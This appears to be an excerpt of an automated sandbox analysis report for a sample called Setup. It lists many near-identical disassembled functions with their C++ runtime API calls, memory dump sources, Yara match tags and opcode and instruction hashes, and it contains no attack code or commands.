                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031B00B6
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031B00C0
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031B0111
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031B0131
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031B013E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: e9c6ae4a2157272253db6cde8bcde31bebf19ae1a61b34263ef728d9af30cdea
                                                                                                                                                                                                                                                      • Instruction ID: e0f96400ed3803e39b7ffc51683d33e458bbbf2275e2edce93cd4daa1d89ea2c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9c6ae4a2157272253db6cde8bcde31bebf19ae1a61b34263ef728d9af30cdea
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A01843A900719ABCB09EBA8D8146FE77B6AF4C720F194009D4116F2D0DF759A45CB91
                                                                                                                                                                                                                                                      Function 031AF75D Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF764
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF76E
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF7BF
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF7DF
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF7EC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 6277c70acbf5a4c522f4afd748de24c21a417db22ac96f544b98c40d77ea91c2
                                                                                                                                                                                                                                                      • Instruction ID: 21fac007d18c5a7cf44cdeb86291ee4ae516bec62ec74a5df08659b4141be63f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6277c70acbf5a4c522f4afd748de24c21a417db22ac96f544b98c40d77ea91c2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B401843E900B599FCB05FBA8D8446BE7B76AF4C712F280109D811AF2D1CF749A45CB91
                                                                                                                                                                                                                                                      Function 031AF7F2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF7F9
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF803
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF854
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF874
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF881
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 64869a839a07a8d90d407525c89f1aec9e873ee28f57a79111eaecccc1d0b1f8
                                                                                                                                                                                                                                                      • Instruction ID: 748ef130f19932246b3523400455240884434e9a5e0b84db03039ac5a0e48014
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64869a839a07a8d90d407525c89f1aec9e873ee28f57a79111eaecccc1d0b1f8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D501803D900A199BCB05EBA8DD54ABE7BB6BF4C721F280409D8116F2D1DF349A46CB91
                                                                                                                                                                                                                                                      Function 031AF509 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF510
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF51A
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF56B
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF58B
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF598
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 42bb07abde26143b75abeaf35d5fe55a66337a7aa25faaed566383d7cbd03655
                                                                                                                                                                                                                                                      • Instruction ID: 72f3decdd591d0f891c1ba599ae93534dcb21f7fe8b2ea971d83c428ee409f54
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42bb07abde26143b75abeaf35d5fe55a66337a7aa25faaed566383d7cbd03655
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8101843E9006199BCB09EFA8D8046BE7776AF4C722F184509D4117F291CF349A468B91
                                                                                                                                                                                                                                                      Function 031AF474 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF47B
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF485
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF4D6
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF4F6
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF503
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: d4feffc1d624f6905b4f764973d4d4ceddac91ddd7c98c78daa6d7137c0a3885
                                                                                                                                                                                                                                                      • Instruction ID: 0e26d1f656212d8c6e72524b8b7ebc483bbbe7e17b3f8f210a382f896ee6c851
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4feffc1d624f6905b4f764973d4d4ceddac91ddd7c98c78daa6d7137c0a3885
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3301C43A9006199FCB04FBA8D8046BEB775BF4C711F280408D4116F291CF749A46C790
                                                                                                                                                                                                                                                      Function 031AF91C Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF923
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF92D
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF97E
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF99E
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF9AB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 835af0825141081dafca67e6a124b5ad0f87621f58e5f155c153f5a4509d85d3
                                                                                                                                                                                                                                                      • Instruction ID: 9a5d884599ceb5d8e4eda2542f6c226da42256a40bfd159020407c67cfa49e6c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 835af0825141081dafca67e6a124b5ad0f87621f58e5f155c153f5a4509d85d3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D018439900B19ABCB05EBACDC446BE77B5AF8C721F290409E4116F2D1CF349A468791
                                                                                                                                                                                                                                                      Function 031AF887 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF88E
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF898
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF8E9
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF909
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF916
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: ca84f9d24f6160f70451e15d79671b6e8c848de76f293d0cab9d2e0563fb4d09
                                                                                                                                                                                                                                                      • Instruction ID: befea2b1ca1a210adf798a4275aa7a6415f52939d884de69a2a1b3d120a05948
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca84f9d24f6160f70451e15d79671b6e8c848de76f293d0cab9d2e0563fb4d09
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE01D63ED00B19ABCB04EBA8DC046BEB772AF4C721F184009E4116F2D0DF349A46CB90
                                                                                                                                                                                                                                                      Function 031AFF85 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFF8C
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFF96
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFFE7
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031B0007
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031B0014
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 3b24f68bfaa8d960bbadf94e8fe1477f22d6e4662de9b43a71d3916df9bf8f73
                                                                                                                                                                                                                                                      • Instruction ID: cb5d35f39f02e3573e6baf34d0286bc4453d1a72b2a983301242d1f8f71ce96f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b24f68bfaa8d960bbadf94e8fe1477f22d6e4662de9b43a71d3916df9bf8f73
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF01923A9007199BCB05FBA8D804AFE7BB6AF8C721F290409E4116F2D1DF359A45C791
                                                                                                                                                                                                                                                      Function 031AFD2F Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFD36
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFD40
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFD91
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFDB1
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFDBE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 92c88385c1bc1609aed1a3359018feb450030ea5071ee654020d2bb279e93b09
                                                                                                                                                                                                                                                      • Instruction ID: 0854d3299f7c44491cadc60f2305fe4f972b4d1075e8e7cd052f493424aa58d3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92c88385c1bc1609aed1a3359018feb450030ea5071ee654020d2bb279e93b09
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1301803A900A19AFCB05FFA8DC54ABEBBB6AF8C711F190009D8116F291DF749A45C791
                                                                                                                                                                                                                                                      Function 031AFDC4 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFDCB
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFDD5
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFE26
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFE46
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFE53
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 236860c7a1540c61852d095c588b4c3f1405d78003c49a236e5577b8971ef523
                                                                                                                                                                                                                                                      • Instruction ID: 9c30e57541722811005c93345af3caf4214ac8a46cc3751e8003b028d223550b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 236860c7a1540c61852d095c588b4c3f1405d78003c49a236e5577b8971ef523
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5401C43A9006199FCB05EBA8DC046BE7BB6AF4C711F190408D4116F292DF359A45CB91
                                                                                                                                                                                                                                                      Function 031AFC05 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFC0C
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFC16
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFC67
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFC87
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFC94
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 2ff6a4a2376cd9e6273de6f7bb36edffe41ae1effe53030c1067ca35e004c0b7
                                                                                                                                                                                                                                                      • Instruction ID: bd7d976a90ae1c0b0511d3f0378bdb0e5d45c0de73b550aad8867b4a5e31a45b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff6a4a2376cd9e6273de6f7bb36edffe41ae1effe53030c1067ca35e004c0b7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3201D23D900A19AFCB05EBA8D904ABE7BB6AF8C721F180409D8116F2D1CF349A45C790
                                                                                                                                                                                                                                                      Function 031AFC9A Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFCA1
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFCAB
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFCFC
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFD1C
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFD29
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 73297b7ece084dbc7a54cb17a18e5da47eac3a97d0334f22bcd50f3f50d460c1
                                                                                                                                                                                                                                                      • Instruction ID: cdba39d84d50fb52fc4d24c75757f6de2450435d9e56a6df9b04295ebef16f16
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73297b7ece084dbc7a54cb17a18e5da47eac3a97d0334f22bcd50f3f50d460c1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A01843D9007199BCB05EBA8DC04ABE7B75AF4C711F180409D4116F2D1DF749A46CB91
                                                                                                                                                                                                                                                      Function 02D613E9 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D613F0
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D613FA
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6144B
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6146B
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D61478
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: f88dfebad10287a4defde860b515dcd786054964d8cfb5166312b2718a760271
                                                                                                                                                                                                                                                      • Instruction ID: 95fe86cc49b14bb481d39f83f58fd35484c8fa88f1e56b60dec3dfa44deb089c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f88dfebad10287a4defde860b515dcd786054964d8cfb5166312b2718a760271
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E001C0319002268BCF05EBA4C9587BEB7A6EF98314F24411AE81867390CF74EE01CFA5
                                                                                                                                                                                                                                                      Function 02D617FE Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D61805
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6180F
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D61860
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61880
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6188D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 675f38d947f0376a6a9fd613c7dbac5a9fa932d0485fbea17c43fb2f9696aaa2
                                                                                                                                                                                                                                                      • Instruction ID: b46c97a4289620ecf8606b580371b4868eb3d1d34d121775fb62659ba1accf8e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 675f38d947f0376a6a9fd613c7dbac5a9fa932d0485fbea17c43fb2f9696aaa2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4901D6319001259BCF05EBA8C9546BDB7B6EF84314F24451AD81567390CF74DD01CFA5
                                                                                                                                                                                                                                                      Function 02D61769 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
